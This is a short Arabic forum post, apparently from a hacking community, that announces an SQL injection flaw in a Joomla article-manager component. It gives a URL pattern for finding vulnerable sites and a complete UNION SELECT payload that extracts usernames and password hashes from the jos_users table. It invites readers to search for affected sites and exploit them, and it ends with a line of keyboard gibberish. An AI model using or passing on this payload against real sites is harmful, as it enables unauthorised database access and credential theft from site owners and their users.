السلام عليكم ورحمة الله وبركاته
جبت لكم اليوم
ثغرة في
سكريبت جمولة
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
كود PHP:
index.php?option=com_articlemanager&Itemid=349&task=display&artid=
طريقة الإستغلال
كود PHP:
null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
الثغرة من إكتشاف
FL0RiX
إن شاء الله تستفيدوا
موفقين بإذن الله ...
eyvm td s;vdfj [l,gm